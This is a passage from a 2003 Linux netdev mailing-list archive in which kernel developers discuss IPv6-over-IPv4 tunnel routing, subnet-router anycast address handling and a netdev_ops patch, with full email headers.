What you can do, though, is not configure a link prefix for the tunnel at all. I.e. you can add the local tunnel end-point as a /128. This won't create an on-link route in the routing table, so you need to point the default route to the interface rather than the peer end-point. For example:

  ifconfig sit0 add 3ffe:dead:beef::dead:beef/128
  ip route add ::/0 dev sit0

Cheers, MikaL

From jgarzik@pobox.com Thu Jul 10 21:52:50 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 21:52:54 -0700 (PDT) Received: from www.linux.org.uk (IDENT:/g2yAGj+1DI8JD4+8VH2VBFWXbGubaom@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6B4qn2x002866 for ; Thu, 10 Jul 2003 21:52:50 -0700 Received: from rdu26-227-011.nc.rr.com ([66.26.227.11] helo=pobox.com) by www.linux.org.uk with esmtp (Exim 4.14) id 19am9v-0006yS-GS; Fri, 11 Jul 2003 01:53:11 +0100 Message-ID: <3F0E0A6C.5000703@pobox.com> Date: Thu, 10 Jul 2003 20:53:00 -0400 From: Jeff Garzik Organization: none User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.2.1) Gecko/20021213 Debian/1.2.1-2.bunk X-Accept-Language: en MIME-Version: 1.0 To: "David S. Miller" CC: scott.feldman@intel.com, willy@debian.org, netdev@oss.sgi.com Subject: Re: [PATCH] netdev_ops References: <20030710.133737.41660806.davem@redhat.com> In-Reply-To: <20030710.133737.41660806.davem@redhat.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3938 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev David S. Miller wrote: > From: "Feldman, Scott" > Date: Thu, 10 Jul 2003 01:18:50 -0700 > > With HAVE_NETDEV_OPS, you're right, we're maintaining the wrapper > code outside the kernel. But, it does leave the possibility of > having a shared backwards compatibility code for multiple (all?)
> drivers for those stuck with supporting kernels without netdev_ops. > > And precisely I am showing you how all this backwards compat > stuff is going to hurt you. You can never truly take advantage > of things that eliminate duplicated code in all the drivers, > and this netdev_ops case is a great example. Actually there is a solution that IMO will make everybody happy. Lemme finish writing up my comments to Matthew... Jeff From pekkas@netcore.fi Thu Jul 10 21:52:08 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 21:52:12 -0700 (PDT) Received: from netcore.fi (netcore.fi [193.94.160.1]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6B4q62x002808 for ; Thu, 10 Jul 2003 21:52:07 -0700 Received: from localhost (pekkas@localhost) by netcore.fi (8.11.6/8.11.6) with ESMTP id h6B4pu324776; Fri, 11 Jul 2003 07:51:57 +0300 Date: Fri, 11 Jul 2003 07:51:56 +0300 (EEST) From: Pekka Savola To: Andre Tomt cc: linux-kernel@vger.kernel.org, Mika Liljeberg , Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked In-Reply-To: <1057888154.26854.324.camel@localhost> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3937 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pekkas@netcore.fi Precedence: bulk X-list: netdev On 11 Jul 2003, Andre Tomt wrote: > On fre, 2003-07-11 at 02:04, Mika Liljeberg wrote: > > Well, the thing is that prefix:: is a special anycast address that > > identifies a router on the link prefix::/n, where n is the prefix > > length. You had configured a 127-bit link prefix, meaning that you had > > only one valid unicast address (last bit == 1) in addition to the router > > anycast address (last bit == 0). > > Thanks for the explanation, I've been struggling to understand what > Yoshfuji tried to explain to me earlier on this topic (see "IPv6 bugs > introduced in 2.4.21" - ie. 
my bogus bugreport), now it all makes > perfect sense :-) Well, the system may make some sense, but IMHO, there is still zero sense in policing this thing when you add a route. That's just plain bogus. This is a bug which must be fixed ASAP. -- Pekka Savola "You each name yourselves king, yet the Netcore Oy kingdom bleeds." Systems. Networks. Security. -- George R.R. Martin: A Clash of Kings From mika.liljeberg@welho.com Thu Jul 10 22:19:37 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 22:19:45 -0700 (PDT) Received: from hades.pp.htv.fi (cs180094.pp.htv.fi [213.243.180.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6B5JZ2x003553 for ; Thu, 10 Jul 2003 22:19:37 -0700 Received: from hades.pp.htv.fi (localhost [127.0.0.1]) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) with ESMTP id h6B5K1Zj009247; Fri, 11 Jul 2003 08:20:01 +0300 Received: (from liljeber@localhost) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) id h6B5K0Wc009227; Fri, 11 Jul 2003 08:20:00 +0300 X-Authentication-Warning: hades.pp.htv.fi: liljeber set sender to mika.liljeberg@welho.com using -f Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked From: Mika Liljeberg To: Pekka Savola Cc: Andre Tomt , linux-kernel@vger.kernel.org, netdev@oss.sgi.com In-Reply-To: References: Content-Type: text/plain Content-Transfer-Encoding: 7bit Message-Id: <1057900800.3588.50.camel@hades> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.4.0 Date: 11 Jul 2003 08:20:00 +0300 X-archive-position: 3939 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mika.liljeberg@welho.com Precedence: bulk X-list: netdev On Fri, 2003-07-11 at 07:51, Pekka Savola wrote: > Well, the system may make some sense, but IMHO, there is still zero sense > in policing this thing when you add a route. That's just plain bogus. > This is a bug which must be fixed ASAP. 
Correct me if I'm wrong but I think in this case the interface had forwarding enabled and the sanity check in fact prevented a default route pointing to the node itself from being configured. Otherwise I fully agree. The subnet router anycast address doesn't warrant any special handling. MikaL From pekkas@netcore.fi Thu Jul 10 22:22:53 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 22:22:57 -0700 (PDT) Received: from netcore.fi (netcore.fi [193.94.160.1]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6B5Mp2x003867 for ; Thu, 10 Jul 2003 22:22:52 -0700 Received: from localhost (pekkas@localhost) by netcore.fi (8.11.6/8.11.6) with ESMTP id h6B5Meb24998; Fri, 11 Jul 2003 08:22:40 +0300 Date: Fri, 11 Jul 2003 08:22:39 +0300 (EEST) From: Pekka Savola To: Mika Liljeberg cc: Andre Tomt , , Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked In-Reply-To: <1057900800.3588.50.camel@hades> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3940 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pekkas@netcore.fi Precedence: bulk X-list: netdev On 11 Jul 2003, Mika Liljeberg wrote: > On Fri, 2003-07-11 at 07:51, Pekka Savola wrote: > > Well, the system may make some sense, but IMHO, there is still zero sense > > in policing this thing when you add a route. That's just plain bogus. > > This is a bug which must be fixed ASAP. > > Correct me if I'm wrong but I think in this case the interface had > forwarding enabled and the sanity check in fact prevented a default > route pointing to the node itself from being configured. > > Otherwise I fully agree. The subnet router anycast address doesn't > warrant any special handling. If that's the case, it's OK -- it's OK, I don't remember the details. (It might be nice to have configurable /proc option on whether to enable the subnet router anycast address at all, but that's also a different story..) 
-- Pekka Savola "You each name yourselves king, yet the Netcore Oy kingdom bleeds." Systems. Networks. Security. -- George R.R. Martin: A Clash of Kings From cip_tech@yahoo.com Thu Jul 10 22:29:27 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 22:29:30 -0700 (PDT) Received: from web14511.mail.yahoo.com (web14511.mail.yahoo.com [216.136.226.29]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6B5TQ2x004198 for ; Thu, 10 Jul 2003 22:29:27 -0700 Message-ID: <20030711052926.10588.qmail@web14511.mail.yahoo.com> Received: from [193.231.184.146] by web14511.mail.yahoo.com via HTTP; Thu, 10 Jul 2003 22:29:26 PDT Date: Thu, 10 Jul 2003 22:29:26 -0700 (PDT) From: cip m Subject: Beginner To: netdev@oss.sgi.com MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="0-551772643-1057901366=:9880" X-archive-position: 3941 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: cip_tech@yahoo.com Precedence: bulk X-list: netdev --0-551772643-1057901366=:9880 Content-Type: text/plain; charset=us-ascii Hi, Can somebody please help me? I want to become a Linux developer and I need a few tips about what languages I need to know and what other knowledge I need. Thanks, CIPRIAN --------------------------------- Do you Yahoo!? SBC Yahoo! DSL - Now only $29.95 per month! --0-551772643-1057901366=:9880 Content-Type: text/html; charset=us-ascii

SBC Yahoo! DSL - Now only $29.95 per month! --0-551772643-1057901366=:9880-- From yoshfuji@linux-ipv6.org Thu Jul 10 22:37:59 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 22:38:03 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6B5bv2x004539 for ; Thu, 10 Jul 2003 22:37:58 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h6B5dQBo018975; Fri, 11 Jul 2003 14:39:26 +0900 Date: Fri, 11 Jul 2003 14:39:26 +0900 (JST) Message-Id: <20030711.143926.599349332.yoshfuji@linux-ipv6.org> To: pekkas@netcore.fi Cc: mika.liljeberg@welho.com, andre@tomt.net, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, yoshfuji@linux-ipv6.org Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: References: <1057900800.3588.50.camel@hades> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on XEmacs 21.4.6 (Common Lisp) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3942 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article (at Fri, 11 Jul 2003 08:22:39 +0300 (EEST)), Pekka Savola says: > (It might be nice to have configurable /proc option on whether to enable > the subnet router anycast address at all, but that's also a different > story..) 
I don't like this while I would be ok to have configuration option not to support anycast. --yoshfuji From pekkas@netcore.fi Fri Jul 11 01:46:17 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 01:46:26 -0700 (PDT) Received: from netcore.fi (netcore.fi [193.94.160.1]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6B8kF2x006679 for ; Fri, 11 Jul 2003 01:46:16 -0700 Received: from localhost (pekkas@localhost) by netcore.fi (8.11.6/8.11.6) with ESMTP id h6B8k1826465; Fri, 11 Jul 2003 11:46:01 +0300 Date: Fri, 11 Jul 2003 11:46:00 +0300 (EEST) From: Pekka Savola To: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= cc: mika.liljeberg@welho.com, , , Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked In-Reply-To: <20030711.143926.599349332.yoshfuji@linux-ipv6.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=ISO-8859-1 X-archive-position: 3943 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pekkas@netcore.fi Precedence: bulk X-list: netdev On Fri, 11 Jul 2003, YOSHIFUJI Hideaki / [iso-2022-jp] $B5HF#1QL@(B wrote: > In article (at Fri, 11 Jul 2003 08:22:39 +0300 (EEST)), Pekka Savola says: > > > (It might be nice to have configurable /proc option on whether to enable > > the subnet router anycast address at all, but that's also a different > > story..) > > I don't like this > while I would be ok to have configuration option > not to support anycast. With "not to support anycast" you probably meant "not to support subnet-router anycast address [automatically, in the kernel, as now]" ? These are entirely different things. (Note that if there's a user-level API for setting anycast addresses, one could kick the subnet-router anycast address out of the kernel too. Whether that's desirable is another thing.) -- Pekka Savola "You each name yourselves king, yet the Netcore Oy kingdom bleeds." Systems. Networks. Security. -- George R.R. 
Martin: A Clash of Kings From yoshfuji@linux-ipv6.org Fri Jul 11 02:03:21 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 02:03:27 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6B93J2x007136 for ; Fri, 11 Jul 2003 02:03:20 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h6B94nBo020844; Fri, 11 Jul 2003 18:04:49 +0900 Date: Fri, 11 Jul 2003 18:04:49 +0900 (JST) Message-Id: <20030711.180449.126456521.yoshfuji@linux-ipv6.org> To: pekkas@netcore.fi Cc: mika.liljeberg@welho.com, andre@tomt.net, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, yoshfuji@linux-ipv6.org Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: References: <20030711.143926.599349332.yoshfuji@linux-ipv6.org> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3944 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article (at Fri, 11 Jul 2003 11:46:00 +0300 (EEST)), Pekka Savola says: > > I don't like this > > while I would be ok to have configuration option > > not to support anycast. > > With "not to support anycast" you probably meant "not to support > subnet-router anycast address [automatically, in the kernel, as now]" ? 
> These are entirely different things. I meant disabling anycast entirely. > (Note that if there's a user-level API for setting anycast addresses, one > could kick the subnet-router anycast address out of the kernel too. > Whether that's desirable is another thing.) We have but we cannot; it is refcnt'ed. --yoshfuji From mika.penttila@kolumbus.fi Fri Jul 11 02:33:43 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 02:33:53 -0700 (PDT) Received: from notes.hallinto.turkuamk.fi (notes.hallinto.turkuamk.fi [195.148.215.149]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6B9Xf2x009008 for ; Fri, 11 Jul 2003 02:33:43 -0700 Received: from kolumbus.fi ([193.166.244.70]) by marconi.hallinto.turkuamk.fi (Lotus Domino Release 5.0.8) with ESMTP id 2003071112345896:20188 ; Fri, 11 Jul 2003 12:34:58 +0300 Message-ID: <3F0E85E6.7050001@kolumbus.fi> Date: Fri, 11 Jul 2003 12:39:50 +0300 From: =?ISO-8859-1?Q?Mika_Penttil=E4?= User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.2) Gecko/20030208 Netscape/7.02 X-Accept-Language: en-us, en MIME-Version: 1.0 To: YOSHIFUJI@oss.sgi.com CC: pekkas@netcore.fi, mika.liljeberg@welho.com, andre@tomt.net, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, yoshfuji@linux-ipv6.org Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked References: <20030711.143926.599349332.yoshfuji@linux-ipv6.org> <20030711.180449.126456521.yoshfuji@linux-ipv6.org> X-MIMETrack: Itemize by SMTP Server on marconi.hallinto.turkuamk.fi/TAMK(Release 5.0.8 |June 18, 2001) at 11.07.2003 12:34:59, Serialize by Router on notes.hallinto.turkuamk.fi/TAMK(Release 5.0.10 |March 22, 2002) at 11.07.2003 12:34:29, Serialize complete at 11.07.2003 12:34:29 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=us-ascii; format=flowed X-archive-position: 3945 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mika.penttila@kolumbus.fi Precedence: bulk X-list: netdev Who 
adds the subnet router anycast address, kernel itself? Since what? I don't see this in 2.5. --Mika YOSHIFUJI Hideaki / ???? wrote: >In article (at Fri, 11 Jul 2003 11:46:00 +0300 (EEST)), Pekka Savola says: > > > >>>I don't like this >>>while I would be ok to have configuration option >>>not to support anycast. >>> >>> >>With "not to support anycast" you probably meant "not to support >>subnet-router anycast address [automatically, in the kernel, as now]" ? >>These are entirely different things. >> >> > >I meant disabling anycast entirely. > > > >>(Note that if there's a user-level API for setting anycast addresses, one >>could kick the subnet-router anycast address out of the kernel too. >>Whether that's desirable is another thing.) >> >> > >We have but we cannot; it is refcnt'ed. > >--yoshfuji >- >To unsubscribe from this list: send the line "unsubscribe linux-kernel" in >the body of a message to majordomo@vger.kernel.org >More majordomo info at http://vger.kernel.org/majordomo-info.html >Please read the FAQ at http://www.tux.org/lkml/ > > > From pekkas@netcore.fi Fri Jul 11 03:04:10 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 03:04:14 -0700 (PDT) Received: from netcore.fi (netcore.fi [193.94.160.1]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BA492x011008 for ; Fri, 11 Jul 2003 03:04:10 -0700 Received: from localhost (pekkas@localhost) by netcore.fi (8.11.6/8.11.6) with ESMTP id h6BA3sb27113; Fri, 11 Jul 2003 13:03:55 +0300 Date: Fri, 11 Jul 2003 13:03:54 +0300 (EEST) From: Pekka Savola To: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= cc: mika.liljeberg@welho.com, , , Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked In-Reply-To: <20030711.180449.126456521.yoshfuji@linux-ipv6.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=ISO-8859-1 X-archive-position: 3946 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pekkas@netcore.fi 
Precedence: bulk X-list: netdev On Fri, 11 Jul 2003, YOSHIFUJI Hideaki / [iso-2022-jp] $B5HF#1QL@(B wrote: > In article (at Fri, 11 Jul 2003 11:46:00 +0300 (EEST)), Pekka Savola says: > > > I don't like this > > > while I would be ok to have configuration option > > > not to support anycast. > > > > With "not to support anycast" you probably meant "not to support > > subnet-router anycast address [automatically, in the kernel, as now]" ? > > These are entirely different things. > > I meant disabling anycast entirely. Oh, I'm not advocating that; however, being able to turn off the subnet router anycast address might be a plus. > > (Note that if there's a user-level API for setting anycast addresses, one > > could kick the subnet-router anycast address out of the kernel too. > > Whether that's desirable is another thing.) > > We have but we cannot; it is refcnt'ed. I don't understand what you mean. Refcnt'ed by a userland process, so that if you'd want the subnet-router anycast address, the whole time a process (like radvd) should be running.. or what? -- Pekka Savola "You each name yourselves king, yet the Netcore Oy kingdom bleeds." Systems. Networks. Security. -- George R.R. 
Martin: A Clash of Kings From yoshfuji@linux-ipv6.org Fri Jul 11 03:45:47 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 03:45:54 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BAjh2x011810 for ; Fri, 11 Jul 2003 03:45:46 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h6BAlDBo021370; Fri, 11 Jul 2003 19:47:13 +0900 Date: Fri, 11 Jul 2003 19:47:13 +0900 (JST) Message-Id: <20030711.194713.21412719.yoshfuji@linux-ipv6.org> To: pekkas@netcore.fi Cc: mika.liljeberg@welho.com, andre@tomt.net, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, yoshfuji@linux-ipv6.org Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: References: <20030711.180449.126456521.yoshfuji@linux-ipv6.org> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3947 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article (at Fri, 11 Jul 2003 13:03:54 +0300 (EEST)), Pekka Savola says: > > We have but we cannot; it is refcnt'ed. > > I don't understand what you mean. Refcnt'ed by a userland process, so > that if you'd want the subnet-router anycast address, the whole time a > process (like radvd) should be running.. or what? 
Kernel has refcnt for subnet router anycast address. Ref/dereference from userspace is done via socket. You cannot derefer subnet router anycast address from userspace if the socket hasn't refered it. --yoshfuji From pekkas@netcore.fi Fri Jul 11 03:48:02 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 03:48:07 -0700 (PDT) Received: from netcore.fi (netcore.fi [193.94.160.1]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BAm12x012045 for ; Fri, 11 Jul 2003 03:48:02 -0700 Received: from localhost (pekkas@localhost) by netcore.fi (8.11.6/8.11.6) with ESMTP id h6BAlmF27388; Fri, 11 Jul 2003 13:47:48 +0300 Date: Fri, 11 Jul 2003 13:47:48 +0300 (EEST) From: Pekka Savola To: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= cc: mika.liljeberg@welho.com, , , Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked In-Reply-To: <20030711.194713.21412719.yoshfuji@linux-ipv6.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=ISO-8859-1 X-archive-position: 3948 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pekkas@netcore.fi Precedence: bulk X-list: netdev On Fri, 11 Jul 2003, YOSHIFUJI Hideaki / [iso-2022-jp] $B5HF#1QL@(B wrote: > In article (at Fri, 11 Jul 2003 13:03:54 +0300 (EEST)), Pekka Savola says: > > > > We have but we cannot; it is refcnt'ed. > > > > I don't understand what you mean. Refcnt'ed by a userland process, so > > that if you'd want the subnet-router anycast address, the whole time a > > process (like radvd) should be running.. or what? > > Kernel has refcnt for subnet router anycast address. > Ref/dereference from userspace is done via socket. > You cannot derefer subnet router anycast address > from userspace if the socket hasn't refered it. So? The point is that subnet router anycast address *could* be referenced explicitly by a user-land socket (e.g. by radvd), not kernel at all. 
-- Pekka Savola "You each name yourselves king, yet the Netcore Oy kingdom bleeds." Systems. Networks. Security. -- George R.R. Martin: A Clash of Kings From yoshfuji@linux-ipv6.org Fri Jul 11 03:57:49 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 03:57:52 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BAvl2x012509 for ; Fri, 11 Jul 2003 03:57:48 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h6BAxHBo021461; Fri, 11 Jul 2003 19:59:17 +0900 Date: Fri, 11 Jul 2003 19:59:17 +0900 (JST) Message-Id: <20030711.195917.89662318.yoshfuji@linux-ipv6.org> To: pekkas@netcore.fi Cc: mika.liljeberg@welho.com, andre@tomt.net, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, yoshfuji@linux-ipv6.org Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: References: <20030711.194713.21412719.yoshfuji@linux-ipv6.org> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3949 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article (at Fri, 11 Jul 2003 13:47:48 +0300 (EEST)), Pekka Savola says: > On Fri, 11 Jul 2003, YOSHIFUJI Hideaki / [iso-2022-jp] $B5HF#1QL@(B wrote: > > In article (at Fri, 11 Jul 2003 13:03:54 +0300 (EEST)), 
Pekka Savola says: > > > > > > We have but we cannot; it is refcnt'ed. > > > > > > I don't understand what you mean. Refcnt'ed by a userland process, so > > > that if you'd want the subnet-router anycast address, the whole time a > > > process (like radvd) should be running.. or what? > > > > Kernel has refcnt for subnet router anycast address. > > Ref/dereference from userspace is done via socket. > > You cannot derefer subnet router anycast address > > from userspace if the socket hasn't refered it. > > So? The point is that subnet router anycast address *could* be referenced > explicitly by a user-land socket (e.g. by radvd), not kernel at all. So, you cannot remove subnet router anycast address from kernel via this interface; kernel keeps one reference. (Hmm, I may misunderstand your mail...) --yoshfuji From pekkas@netcore.fi Fri Jul 11 03:59:28 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 03:59:32 -0700 (PDT) Received: from netcore.fi (netcore.fi [193.94.160.1]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BAxR2x012782 for ; Fri, 11 Jul 2003 03:59:28 -0700 Received: from localhost (pekkas@localhost) by netcore.fi (8.11.6/8.11.6) with ESMTP id h6BAxFv27493; Fri, 11 Jul 2003 13:59:15 +0300 Date: Fri, 11 Jul 2003 13:59:14 +0300 (EEST) From: Pekka Savola To: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= cc: mika.liljeberg@welho.com, , , Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked In-Reply-To: <20030711.195917.89662318.yoshfuji@linux-ipv6.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=ISO-8859-1 X-archive-position: 3950 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pekkas@netcore.fi Precedence: bulk X-list: netdev On Fri, 11 Jul 2003, YOSHIFUJI Hideaki / [iso-2022-jp] $B5HF#1QL@(B wrote: > In article (at Fri, 11 Jul 2003 13:47:48 +0300 (EEST)), Pekka Savola says: > > > On Fri, 11 Jul 2003, YOSHIFUJI Hideaki / 
